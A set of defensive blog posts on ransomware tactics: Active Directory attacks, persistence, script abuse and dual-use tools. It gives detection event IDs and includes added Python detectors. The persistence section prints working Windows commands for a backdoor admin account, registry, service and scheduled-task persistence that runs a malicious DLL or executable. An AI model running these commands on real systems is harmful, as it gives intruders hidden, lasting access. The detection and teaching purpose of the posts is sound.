
- Active Directory Attacks: A Dive into Ransomware Tactics
Active Directory (AD) is the backbone of many corporate networks, providing centralized management of users, devices, and permissions. Because of this central role, AD has become a prime target for ransomware operators and threat actors seeking higher levels of access and persistence within networks.

Why Active Directory?

Active Directory is critical for managing network resources, authentication, and security policies. Attackers target AD because compromising it can lead to widespread access, allowing them to move laterally, escalate privileges, and gain control over entire environments.

This post will not go in depth on AD itself, but a few basics:

- Microsoft's Active Directory (AD) provides a centralized database and services that allow users to connect to networking resources.
- Domains use a Domain Name System (DNS) structure to organize namespaces into logical units. For example, a domain of victimnetwork.local might be set up to contain resources specific to a logical grouping of users, computers, and other objects within the AD database.
- Domain controllers (DCs) are servers that respond to authentication requests and determine whether the requesting users should be granted access to the domain. The DCs in an AD environment may also provide services and protocols such as DNS, Dynamic Host Configuration Protocol (DHCP), and other services that allow hosts access to the network or to resources provided within it.
- Authentication within AD is often carried out via the Kerberos authentication protocol.

If you are using a Windows computer on a corporate network, you are most likely connected to AD. The overall AD system provides the domain to which you are connected. In order to be connected to that domain, you must authenticate to it, which you typically do by logging in to your machine with the username and password of your domain account.
Popular Tools Used in Active Directory Attacks

Nltest
- What it does: A built-in Windows command-line tool, nltest helps attackers pull domain-related information, such as domain lists and trust relationships.
- Why it's used: It gives attackers a quick and easy way to perform reconnaissance on the AD environment.

AdFind
- What it does: Originally developed as an LDAP query tool for IT admins, AdFind has been repurposed by attackers to extract data from AD environments.
- Why it's used: It is highly valued among attackers for its ability to pull detailed AD information, including user accounts, group memberships, and more.

BloodHound
- What it does: BloodHound is a reconnaissance tool that maps relationships between AD objects, helping attackers identify vulnerable attack paths.
- Why it's used: It provides a graphical interface that makes it easier for attackers to understand the AD environment and find weaknesses to exploit.

Mimikatz
- What it does: A well-known credential harvesting tool, Mimikatz can extract credentials directly from memory, including passwords, hashes, and Kerberos tickets.
- Why it's used: Mimikatz is a go-to tool for attackers looking to escalate privileges and gain deeper access to the network.

Rubeus
- What it does: Rubeus is a C# tool focused on Kerberos attacks, such as Kerberoasting and AS-REP Roasting.
- Why it's used: It allows attackers to obtain encrypted credential material and crack it offline, often leading to compromised accounts.

CrackMapExec
- What it does: This versatile post-exploitation tool helps attackers assess and exploit security weaknesses in AD environments.
- Why it's used: CrackMapExec simplifies the process of exploiting AD weaknesses, making it a favorite among threat actors.

Common Active Directory Attack Techniques

Now, let's delve into some of the most common AD attacks used by ransomware operators and threat actors.

1. BloodHound and AD Reconnaissance

BloodHound is often used after initial access to map out the AD environment. Attackers use a collector called SharpHound to gather information on AD objects, such as users, computers, and groups. Once this data is collected, it is passed to BloodHound, which generates a graphical representation of attack paths using the Neo4j graph database.

Detection:
- Monitor for SharpHound (or any renamed executables) being written to disk (Sysmon Event ID 11, via EDR, or manual MFT analysis). Pay attention to the file's original name to spot potential renaming attempts.
- Look for signs of reconnaissance activity, such as unusual LDAP queries.

2. Kerberoasting

Kerberoasting targets service accounts within AD that have a Service Principal Name (SPN) assigned. Attackers request a Kerberos service ticket for these accounts; a portion of that ticket is encrypted with a key derived from the service account's password. Once the ticket is obtained, attackers attempt to crack the password offline.

Detection:
- Enable "Audit Kerberos Service Ticket Operations" in AD.
- Monitor for Event ID 4769, focusing on Ticket Options (0x40810000) and Ticket Encryption Type (0x17 for RC4).
- Alert on .kirbi file creation (Mimikatz saves tickets with a .kirbi extension).
- Watch for known Kerberoasting tools like Mimikatz and Rubeus in your environment.

Mitigation:
- Remove SPNs from accounts where possible.
- Use strong, non-crackable passwords for service accounts (long and high-entropy).
- Consider using Managed Service Accounts (MSAs) to mitigate the risk.

3. AS-REP Roasting

AS-REP Roasting exploits accounts with Kerberos pre-authentication disabled. In a typical Kerberos authentication process, pre-authentication ensures that the user's password is verified by the Key Distribution Center (KDC) before a ticket is issued. If pre-authentication is disabled, however, attackers can request an AS-REP message for the account without supplying a valid password, and the encrypted part of that reply can then be cracked offline.
Detection:
- Monitor for Event ID 4768, focusing on accounts where the Pre-Authentication Type is 0.
- Investigate why pre-authentication is disabled for any accounts in your environment.

Mitigation:
- Review accounts with pre-authentication disabled and re-enable it where possible.
- Ensure that accounts with pre-authentication disabled have strong, non-crackable passwords.

4. DCSync Attack

DCSync is a powerful attack that allows an attacker to simulate the behavior of a domain controller (DC) and request replication of AD data. With replication permissions, the attacker can pull password hashes for all users in the domain, including highly privileged accounts such as Domain Admins.

Detection:
- Monitor for Event ID 4662, which indicates that an operation was performed on an AD object. Pay attention to the Properties field for the following control access rights:
  - DS-Replication-Get-Changes
  - DS-Replication-Get-Changes-All
  - DS-Replication-Get-Changes-In-Filtered-Set
- The control access GUIDs that matter for DCSync attacks are:
  - {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} – DS-Replication-Get-Changes
  - {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} – DS-Replication-Get-Changes-All
  - {89e95b76-444d-4c62-991a-0facbeda640c} – DS-Replication-Get-Changes-In-Filtered-Set
- Watch for accounts being granted replication permissions, as this is a key indicator of a potential DCSync attack.

Mitigation:
- Lock down replication permissions and ensure that only the accounts that genuinely need them have this level of access.
- Use strong, non-crackable passwords for accounts with replication permissions.
- Regularly audit accounts with high-level privileges, especially those with replication permissions.

Conclusion: Protecting Active Directory

Active Directory attacks are a significant threat to organizations, particularly when leveraged by ransomware operators. These attacks can give attackers deep access to your network and the ability to spread ransomware across the entire environment.
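The rule logic for the three event-based detections above (4769 Kerberoasting, 4768 AS-REP Roasting, 4662 DCSync), written as an added example that is not part of the original post. It runs over constructed sample records whose field names follow the EventData names of the Security event XML; the machine-account and krbtgt exclusions are added refinements, not something the post states.

```python
# Added example (not from the original post): rule logic for the three
# event-based detections described above, run over constructed sample records.
# Field names follow the EventData names of the Windows Security event XML;
# the sample records below are constructed, not real telemetry.
from typing import Callable, Dict, List, Optional

Event = Dict[str, object]
Finding = Dict[str, str]

# Control Access GUIDs listed in the post (Event ID 4662 "Properties" field).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
KERBEROAST_TICKET_OPTIONS = "0x40810000"  # from the post
RC4_HMAC = "0x17"                         # from the post


def _is_machine_account(name: str) -> bool:
    return name.endswith("$")


def check_kerberoasting(ev: Event) -> Optional[Finding]:
    """Event ID 4769: service ticket requested with RC4 and the roasting ticket options."""
    if ev.get("EventID") != 4769:
        return None
    if str(ev.get("TicketEncryptionType", "")).lower() != RC4_HMAC:
        return None
    if str(ev.get("TicketOptions", "")).lower() != KERBEROAST_TICKET_OPTIONS:
        return None
    service = str(ev.get("ServiceName", ""))
    # Added refinement (not in the post): computer accounts and krbtgt have
    # long random secrets, so tickets for them are noise for this rule.
    if _is_machine_account(service) or service.lower() == "krbtgt":
        return None
    return {"rule": "Kerberoasting", "requester": str(ev.get("TargetUserName", "")),
            "service": service, "source_ip": str(ev.get("IpAddress", ""))}


def check_asrep_roasting(ev: Event) -> Optional[Finding]:
    """Event ID 4768: TGT requested for an account with Pre-Authentication Type 0."""
    if ev.get("EventID") != 4768 or str(ev.get("PreAuthType", "")) != "0":
        return None
    return {"rule": "AS-REP Roasting", "account": str(ev.get("TargetUserName", "")),
            "source_ip": str(ev.get("IpAddress", ""))}


def check_dcsync(ev: Event) -> Optional[Finding]:
    """Event ID 4662: replication control access rights exercised by a non-DC account."""
    if ev.get("EventID") != 4662:
        return None
    props = str(ev.get("Properties", "")).lower()
    rights = [name for guid, name in REPLICATION_GUIDS.items() if guid in props]
    if not rights:
        return None
    subject = str(ev.get("SubjectUserName", ""))
    # Added refinement (not in the post): DCs replicate with each other under
    # their machine accounts; a user account holding these rights is the signal.
    if _is_machine_account(subject):
        return None
    return {"rule": "DCSync", "subject": subject, "rights": ", ".join(rights)}


CHECKS: List[Callable[[Event], Optional[Finding]]] = [
    check_kerberoasting, check_asrep_roasting, check_dcsync]


def triage(events: List[Event]) -> List[Finding]:
    """Run every rule over every record and collect the hits in input order."""
    findings: List[Finding] = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample records: one hit and one miss per rule.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 4769, "TargetUserName": "jdoe@VICTIMNETWORK.LOCAL", "ServiceName": "svc_sql",
     "TicketOptions": "0x40810000", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.25"},
    {"EventID": 4769, "TargetUserName": "jdoe@VICTIMNETWORK.LOCAL", "ServiceName": "svc_sql",
     "TicketOptions": "0x40810000", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.25"},
    {"EventID": 4768, "TargetUserName": "backup_svc", "PreAuthType": "0", "IpAddress": "::ffff:10.0.0.25"},
    {"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": "2", "IpAddress": "::ffff:10.0.0.25"},
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Feed it records exported from your SIEM with the same EventData field names; the AES-encrypted 4769 and the DC machine-account 4662 in the sample are deliberately left unflagged.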
For more in-depth details on some of these attacks, check out this insightful post on DCSync attacks by Jaye, which explores AD replication in detail: https://www.cyberengage.org/post/unveiling-threats-exploring-active-directory-replication-from-non-machine-account-mimikatz-dc-syn

Akash Patel

Bonus: The Conti ransomware group had a documentation leak in 2021; the leaked document was essentially training material for affiliates on how to conduct attacks (the manual was named "CobaltStrike MANUALS v2 Active Directory"). Attaching it for you:
- Persistence: The Art of Staying Hidden
In the world of ransomware, persistence is key. Once attackers gain access to a system, their goal is to maintain that access for as long as possible, often without detection. To achieve this, they use a variety of techniques, ranging from post-exploitation frameworks to seemingly legitimate remote monitoring and management (RMM) tools. Let's dive in.

Post-Exploitation Frameworks: The GitHub Goldmine

GitHub is a treasure trove for cybercriminals, offering a wide array of post-exploitation frameworks that can be easily pulled and deployed. These frameworks are often designed to help attackers establish persistence on compromised systems. Some of the most notorious examples include:

- Emotet and TrickBot: These Malware-as-a-Service (MaaS) families are well known for their persistence techniques.
- Web Shells: Ransomware actors are increasingly leveraging web shells, which are scripts dropped onto a web server. These scripts, whether ASPX for IIS or ASP for Apache or Nginx, allow attackers to connect to the system via HTTP/HTTPS and run commands. This method is particularly stealthy, as it blends in with normal web traffic, making it difficult to detect.

Learn More: For an in-depth look at web shells, see this link.

RMM Tools: Hiding in Plain Sight

Ransomware affiliates are increasingly using RMM tools to establish persistence. These tools, designed for legitimate remote management of systems, can be a double-edged sword. In the hands of an attacker, they blend seamlessly into the victim's environment, often going unnoticed by IT and security teams.

Why RMM Tools Are Dangerous:
- Legitimacy: RMM tools are often mistaken for legitimate software, making it easy for attackers to maintain access without raising red flags.
- Baseline Monitoring: If your organization doesn't have an approved list of RMM tools integrated with your software management system, it's time to create one. Establish a baseline and set up alerts for any RMM tools that don't match it.
For example, if ScreenConnect is the only approved RMM tool, any other RMM software should trigger an alert.

RMM Tool Analysis: Here's where you can find logs for some common RMM tools.

AnyDesk:
- %PROGRAMDATA%\AnyDesk\connection_trace.txt
- %PROGRAMDATA%\AnyDesk\ad_svc.trace
- %APPDATA%\AnyDesk\ad.trace

ConnectWise:
- %SYSTEMROOT%\temp\screenconnect\[version]\
- %PROGRAMDATA%\ScreenConnect Client ([fingerprint])\
- %PROGRAMFILES(x86)%\ScreenConnect Client ([fingerprint])\
- %USERPROFILE%\Documents\ConnectWiseControl\Files\
- %USERPROFILE%\Documents\ConnectWiseControl\captures\

TeamViewer:
- C:\Program Files\TeamViewer\Connections_incoming.txt
- C:\Program Files\TeamViewer\TeamViewer15_Logfile.log
- C:\Program Files\TeamViewer\TVNetwork.log
- %APPDATA%\TeamViewer\TeamViewer15_Logfile.log
- %LOCALAPPDATA%\Temp\TeamViewer\TV15Install.log

Learn More: For a deeper dive into RMM tool analysis, check out Théo Letailleur's article on legitimate RATs, covering TeamViewer, AnyDesk, Atera, and Splashtop, at this link.

The Rise of Post-Exploitation Frameworks

Post-exploitation frameworks, both commercial and open-source (FOSS), are commonly used by ransomware actors to establish persistence.

- Commercial Tools: Cobalt Strike and Brute Ratel are two of the most popular commercial tools used in ransomware attacks.
- FOSS Solutions: Open-source frameworks like the former PowerShell Empire project are also widely used. Even though the original PowerShell Empire project has been archived, a new project called Empire has picked up where it left off. This new project combines the PowerShell Empire and Python EmPyre projects, and it is frequently leveraged in ransomware campaigns.

Learn More: For more details on Empire, check out the project's web page at this link.

Persistence Techniques

1. Account Creation

Attackers use various methods to create new user accounts and add them to privileged groups. The standard tools they use include Command Prompt and PowerShell.
Command Prompt Commands: Attackers can use the net user and net localgroup commands to create new user accounts and elevate them to privileged groups.

net user SAMAdmim #sorryNOTsorry# /add
net localgroup administrators SAMAdmim /add
net localgroup "Remote Desktop Users" SAMAdmim /add

PowerShell Commands: PowerShell provides cmdlets to achieve the same result in a more scriptable way.

New-LocalUser -Name "SAMAdmim" -Password (ConvertTo-SecureString "#sorryNOTsorry#" -AsPlainText -Force) -FullName "SAM Administrator" -Description "Admin user"
Add-LocalGroupMember -Group Administrators -Member SAMAdmim
Add-LocalGroupMember -Group "Remote Desktop Users" -Member SAMAdmim

Event-Based Detection:
- Event ID 4720: A user account was created.
- Event ID 4728: A member was added to a security-enabled global group.

Artifact-Based Detection: In addition to monitoring event logs, examining filesystem artifacts can help identify unauthorized account creation.
- Creation Timestamps: When a new user account is created, a corresponding directory is created under C:\Users\[User]. Reviewing the creation timestamp of this directory can reveal when the account was created, which is useful for timeline analysis.
- NTUSER.DAT Registry Hive: Each user account has an associated NTUSER.DAT registry hive that stores user-specific configuration data. Investigating the creation timestamp and contents of this file can provide further evidence of unauthorized activity.

2. Boot/Logon Autostart

These are the most common persistence methods used by threat actors and malware, techniques that have been prevalent since the 1990s. Ransomware operators, in particular, frequently employ these methods to maintain control over infected systems.

Run Keys (Registry-based Autostart Entries): Run and RunOnce keys are frequently used for persistence by malware. These registry keys allow applications to be executed automatically when a user logs in.
Example paths:
- HKLM\Software\Microsoft\Windows\CurrentVersion\Run
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run

These keys are some of the oldest and most widely abused mechanisms, and they remain popular among modern threat actors, including ransomware operators.

Startup Folder: Placing shortcuts or scripts in the startup folder ensures that the malware will be executed whenever the user logs into Windows.

Example path: C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Winlogon: The Winlogon process is responsible for handling user logons. By modifying specific registry values, attackers can execute code during the logon process. Two popular values within the Winlogon key are Userinit and Shell.

Example path: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

This method is stealthier than Run keys, as it ties directly into the user authentication process.

SilentProcessExit: This method leverages a registry key that allows an action to be configured to execute when a specific process exits. For example, the following command creates persistence by launching rundll32 to execute a function from a malicious DLL whenever Notepad is closed:

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "c:\windows\system32\cmd.exe rundll32.exe c:\users\public\music\not_a_beacon.dll,Control_runDLL"

This method allows malware to stay hidden until a seemingly benign process, like Notepad, exits.

MITRE ATT&CK Framework: Autostart Locations

The MITRE ATT&CK framework provides a detailed list of common autostart locations, which are frequently abused for persistence. You can find an extensive catalog of these techniques at MITRE ATT&CK - T1547.001.
Some of the most notable locations include:
- Startup Folder: C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
- RunOnceEx Key: HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
- Explorer User Shell Folders: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- Shell Folders: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

These autostart locations are often the first place incident responders and forensic analysts check when hunting for signs of persistence.

3. Services and Their Role in Ransomware Persistence

In most ransomware attacks, the installation of services plays a critical role in ensuring persistence. Services allow ransomware to continue running in the background, often with elevated privileges.

How Services Work in Windows

A service in Windows is a background process that typically starts when the computer boots and runs without user interaction. Services are managed using commands like sc or net, or via PowerShell cmdlets like Get-Service and Stop-Service.

Event IDs to Monitor for Services

PE (Portable Executable): This is the file format used by Windows for executables, DLLs, and more. However, not all PE files are capable of running as a service. They need to be specifically designed with the code needed to interact with the Windows Service Control Manager (SCM) to start, stop, and handle service-related commands.

Example: A regular application like notepad.exe is a PE file, but it cannot run as a service because it does not have the code needed to function as one.

Service Handlers and ImagePath

ImagePath: When you define a service in the Windows registry, one of the values associated with the service is ImagePath. This value points to the executable file on disk that handles the service.
Example:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MyService
ImagePath = "C:\Program Files\MyService\MyService.exe"

NSSM (Non-Sucking Service Manager)

The Non-Sucking Service Manager is a tool that allows you to run any executable as a service, even if that executable was not designed to run as one.

Why is this important for adversaries? Regular malware executables (PE files) are not designed to run as services. Using NSSM, however, attackers can wrap these files in a service, so the malware starts automatically when the system boots and runs in the background without user intervention.

Example of NSSM Usage: Say an attacker has a malicious executable named malware.exe. Normally, malware.exe is just a regular PE file and cannot run as a service. Using NSSM, the attacker can create a service that uses malware.exe as the service handler:

nssm install MyMalwareService "C:\Path\To\malware.exe"

This command tells NSSM to install malware.exe as a service named MyMalwareService. Now, every time the system boots, malware.exe will run as a service, making it harder to detect and remove.

4. Scheduled Tasks

In many ransomware attacks, scheduled tasks are commonly employed as a method of persistence. Attackers use tools like schtasks.exe to automate the execution of malicious code at specific intervals or events, ensuring that their malware remains active on the system even after a reboot.

Example of a Malicious Scheduled Task: Threat actors often use the schtasks.exe command to create malicious tasks. For example:

cmd.exe /c schtasks /f /create /ru samadmin /sc ONLOGON /tn "\Microsoft\windows\XBox" /tr "%COMSPEC% /c %APPDATA%\42.exe"

This command creates a scheduled task named "samadmin" in the \Microsoft\windows\XBox container. The task is set to trigger upon user logon (/sc ONLOGON) and runs the file located at %APPDATA%\42.exe.
Essentially, every time the user logs in, the malicious executable (42.exe) is executed.

Event-Based Detection: Registry and File System Artifacts

Windows stores scheduled task information in various locations within the system.

Registry Keys:
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree

Task Definitions on Disk: C:\Windows\System32\Tasks\

Each task in Windows is defined by an XML file stored in this directory. These XML files describe the task's behavior, including the program to be executed, the trigger conditions, and the user context under which the task runs. When conducting a forensic investigation, it is crucial to collect all files from this directory, as they provide detailed information about the scheduled tasks on the system.

5. WMI Event Subscription: Stealthy Persistence Technique

Windows Management Instrumentation (WMI) is a powerful framework used for managing data and devices in a Windows environment. Unfortunately, threat actors have recognized WMI's capabilities and have been leveraging it for stealthy persistence.

WMI subscriptions rely on three main components:
- Filters: Define the conditions under which the subscription will trigger.
- Consumers: Define the action or command to execute when the subscription triggers.
- Binders: Link the filter and consumer together, creating a fully functional WMI subscription.

Example WMI Event Subscription: Suppose an attacker wants to execute malicious code whenever the system reaches a certain uptime. The filter defines the condition (system uptime), and the consumer specifies the malicious code to execute:
- Filter: Monitors system uptime and triggers when the uptime is between 240 and 325 seconds.
- Consumer: Executes LegitUpdater.exe from the C:\Windows\Temp\ directory when the filter condition is met.
With this setup, the malicious code is executed in the background whenever the system uptime condition is satisfied, allowing the attacker to maintain persistence without detection.

Further Reading on WMI Persistence

For a deep dive into WMI's capabilities and persistence techniques, I have created an extensive series of blog posts covering various aspects of WMI:
- Part 1: WMI – A Deep Dive into its Capabilities and Stealthy Persistence Techniques
- Part 2: WMI – Detecting and Defending Against WMI-based Attacks
- Part 3: WMI – Understanding WMI Event Consumers in Cybersecurity
- Part 4: WMI – The Intricacies of MOF Files: A Gateway for Malicious Infiltration in WMI
- Part 5: WMI – Unveiling the Persistence of Malicious MOF Files: A Deep Dive into PRAGMA AUTORECOV
- Part 6: WMI – Hunting Down Malicious WMI Activity

For more detailed insights into WMI event consumers, you can also explore Matthew Green's article, "WMI Event Consumers: What Are You Missing?", available in the Velociraptor project documentation here.

Conclusion

Persistence techniques are a cornerstone of many ransomware attacks and other forms of malware, allowing adversaries to maintain their foothold on compromised systems. Each technique presents its own challenges for detection, but by understanding how these methods work and regularly monitoring key system artifacts—such as registry entries, scheduled tasks, services, and WMI subscriptions—security professionals can identify and mitigate persistence mechanisms before they escalate into more significant threats.

Akash Patel
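A parser for the task XML files the scheduled-tasks section says to collect from C:\Windows\System32\Tasks\, written as an added example that is not part of the original post. It extracts the trigger, principal and Exec action from each file and flags actions that reference the user-writable locations and interpreters discussed above; the two task definitions embedded below are constructed samples modelled on the post's schtasks example, not files from a real host.

```python
# Added example (not from the original post): parse the task XML files that
# Windows keeps under C:\Windows\System32\Tasks\ and flag actions that match
# the patterns above. The two task definitions below are constructed samples
# modelled on the schtasks example in the post, not files from a real host.
import os
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Union

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations and binaries from the post that deserve a second look in a task action.
USER_WRITABLE_HINTS = ("%appdata%", "%localappdata%", "%temp%", "%tmp%", "%public%",
                       "\\users\\public\\", "\\windows\\temp\\", "%programdata%")
LOLBIN_HINTS = ("%comspec%", "cmd.exe", "powershell", "rundll32", "regsvr32", "mshta",
                "wscript", "cscript", "msiexec", "bitsadmin", "msbuild")


def load_task_xml(data: Union[bytes, str]) -> ET.Element:
    """Task files on disk are UTF-16 with a BOM; accept raw bytes or already-decoded text."""
    if isinstance(data, bytes):
        data = data.decode("utf-16" if data[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8")
    # Drop the <?xml ... encoding="UTF-16"?> declaration: the text is already decoded.
    return ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", data))


def parse_task(data: Union[bytes, str]) -> Dict:
    """Pull out who registered the task, what triggers it, who it runs as and what it runs."""
    root = load_task_xml(data)
    triggers = root.find("t:Triggers", NS)
    principal = root.find(".//t:Principals/t:Principal", NS)
    actions = [{"command": ex.findtext("t:Command", default="", namespaces=NS).strip(),
                "arguments": ex.findtext("t:Arguments", default="", namespaces=NS).strip()}
               for ex in root.findall(".//t:Actions/t:Exec", NS)]
    return {
        "author": root.findtext("t:RegistrationInfo/t:Author", default="", namespaces=NS),
        "triggers": [] if triggers is None else [c.tag.rsplit("}", 1)[-1] for c in triggers],
        "run_as": "" if principal is None else principal.findtext("t:UserId", default="", namespaces=NS),
        "run_level": "" if principal is None else principal.findtext("t:RunLevel", default="", namespaces=NS),
        "actions": actions,
    }


def assess_task(task: Dict) -> List[str]:
    """Reasons to look closer; an empty list means nothing matched."""
    reasons: List[str] = []
    for action in task["actions"]:
        blob = (action["command"] + " " + action["arguments"]).lower()
        if any(hint in blob for hint in USER_WRITABLE_HINTS):
            reasons.append("action references a user-writable location")
        if any(hint in blob for hint in LOLBIN_HINTS):
            reasons.append("action runs through an interpreter or LOLBin")
    if reasons and "LogonTrigger" in task["triggers"]:
        reasons.append("fires at logon")
    if reasons and task["run_level"] == "HighestAvailable":
        reasons.append("requests highest available privileges")
    return reasons


def scan_tasks_dir(tasks_dir: str) -> Dict[str, List[str]]:
    """Walk an exported Tasks directory and return {task path: reasons} for flagged tasks."""
    flagged: Dict[str, List[str]] = {}
    for folder, _, files in os.walk(tasks_dir):
        for name in files:
            path = os.path.join(folder, name)
            with open(path, "rb") as fh:
                try:
                    reasons = assess_task(parse_task(fh.read()))
                except ET.ParseError:
                    continue  # not a task definition
            if reasons:
                flagged[path] = reasons
    return flagged


# Constructed sample: what the schtasks command in the post would leave on disk.
SUSPECT_TASK = r'''<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>VICTIMNETWORK\samadmin</Author><URI>\Microsoft\windows\XBox</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>samadmin</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>%COMSPEC%</Command><Arguments>/c %APPDATA%\42.exe</Arguments></Exec></Actions>
</Task>'''

# Constructed sample: a vendor updater running from Program Files, nothing to flag.
BENIGN_TASK = r'''<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Program Files\ExampleVendor\Updater.exe</Command><Arguments>/silent</Arguments></Exec></Actions>
</Task>'''

if __name__ == "__main__":
    for label, xml_text in (("suspect", SUSPECT_TASK), ("benign", BENIGN_TASK)):
        task = parse_task(xml_text)
        print(label, task["run_as"], task["triggers"], task["actions"], assess_task(task))
```

Point scan_tasks_dir at a copy of the Tasks directory collected during an investigation; the hint lists are a starting point, and legitimate software does occasionally run from ProgramData, so treat the output as a triage queue rather than a verdict.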
- Dark Side of Scripting: How Ransomware Abuses Powerful Tools
Ransomware attacks have become increasingly sophisticated, with attackers leveraging every tool at their disposal to wreak havoc. Among these tools, scripting languages like PowerShell, batch scripts, JavaScript, and Visual Basic scripting have become favorites. These languages are powerful and versatile, making them ideal for automating tasks, but in the wrong hands they can be used to execute some pretty nasty stuff.

PowerShell: A Double-Edged Sword

PowerShell is a powerhouse in the world of scripting. It's like the Swiss Army knife of Windows, capable of doing almost anything from managing files to interacting with the Win32 API and .NET Framework assemblies. This flexibility is a boon for system administrators, but it also makes PowerShell an attractive tool for cybercriminals.

Why Ransomware Loves PowerShell:
- Post-Exploitation Frameworks: Tools like Empire and PowerSploit are written in PowerShell, allowing attackers to execute a wide range of post-exploitation activities.
- Obfuscation: Daniel Bohannon's Invoke-Obfuscation project makes it easy to hide malicious PowerShell commands. Combine this with his DOSfuscation techniques, and you've got a recipe for highly obfuscated, hard-to-detect scripts.
- Elastic Syntax: PowerShell's flexible parameter syntax means attackers can shorten commands, making them less obvious in logs. For example, instead of using -ExecutionPolicy Unrestricted, an attacker might just use -ex Unrestricted.

PowerShell Logging: Tracking PowerShell Misuse

PowerShell isn't just powerful for attackers; it's also great for defenders. For example, the PSReadLine module in PowerShell keeps a history of commands for each user. This can be a goldmine when investigating an attack, especially if the attacker's credentials are captured in the history.
You can find these history files at: %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Batch Scripts: The Silent Executors

Batch scripts might seem old school, but they're still a favorite among ransomware authors. These .bat files can be incredibly sneaky, often executing without leaving much of a trace.

What Makes Batch Scripts Dangerous:
- Lack of Default Logging: By default, Windows doesn't log batch script execution. This means that unless you've enabled process auditing or have an EDR solution in place, you might not even know a script has run.
- Self-Destruction: Batch scripts can delete themselves after execution, making it harder to track what happened. Imagine a PE file dropping a batch script that deletes the original file and then itself—tricky to trace, right?
- Where to Look: Keep an eye on Shimcache, where batch files might leave a trace even after they've deleted themselves.

JavaScript and Visual Basic: Not Just for the Web

Most people think of JavaScript as the language of the web, but did you know that Microsoft's Windows Script Host (WSH) can also run JavaScript on your local machine? This is done through wscript.exe, which executes .js files.

How Attackers Use JavaScript:
- Direct Execution: Attackers can run JavaScript files directly using the CLI version of WSH (cscript.exe), making it easy to execute scripts with a double-click.
- Obfuscation and Malicious Code: Just like PowerShell, JavaScript can be obfuscated to hide malicious intent. Attackers often use this to bypass detection mechanisms.

Learn more about Microsoft's JScript at https://en.wikipedia.org/wiki/JScript and about ECMAScript at https://en.wikipedia.org/wiki/ECMAScript.

Conclusion: Staying One Step Ahead

Ransomware isn't going away anytime soon, and as defenders we need to stay vigilant. By understanding how scripting engines are abused, we can better prepare ourselves to detect and respond to these threats.
Whether it's through enabling logging, monitoring specific directories, or simply staying informed, every little bit helps in the fight against ransomware. So, the next time you see a suspicious script running on your network, don't brush it off. It might just be the tip of the iceberg.

Akash Patel
- Ransomware Tactics: Leveraging Legitimate Tools and Advanced Techniques
Ransomware actors have increasingly shifted their tactics, techniques, and procedures (TTPs) to include the use of legitimate commercial and open-source software rather than relying solely on their custom-built webshells or malware. This shift is often referred to as "Bring Your Own Tools" (BYOT), where threat actors use trusted and widely available tools for malicious purposes.

Ransomware Actors' Arsenal: From Webshells to Commercial Tools

Ransomware actors are now using a variety of free, commercial, and open-source software in their attacks. Some of the most commonly used tools include:
- BloodHound: A tool that identifies and exploits misconfigurations in Active Directory environments.
- WinSCP: A popular free SFTP, FTP, WebDAV, and SCP client.
- PoshC2: A command and control framework that is often used for post-exploitation.
- Cobalt Strike: A commercial adversary simulation tool used to emulate advanced threats.
- Brute Ratel: A red-teaming tool designed to evade detection by EDR and AV solutions.
- AdFind: An LDAP query tool used to gather information from Active Directory.

These tools are often used by ransomware operators to move laterally, gather intelligence, and escalate privileges within a compromised environment.

The Darknet Marketplace: Where Exploits and Tools Are Sold

If you explore darknet forums, you'll find that commercial tools like CANVAS, Cobalt Strike, and Core Impact are often available for sale. These tools, originally developed for legitimate purposes such as penetration testing, are being weaponized by ransomware groups to compromise networks.

